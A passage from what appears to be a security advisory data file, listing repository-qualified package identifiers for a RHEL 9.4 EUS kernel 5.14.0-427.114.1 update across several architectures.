"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
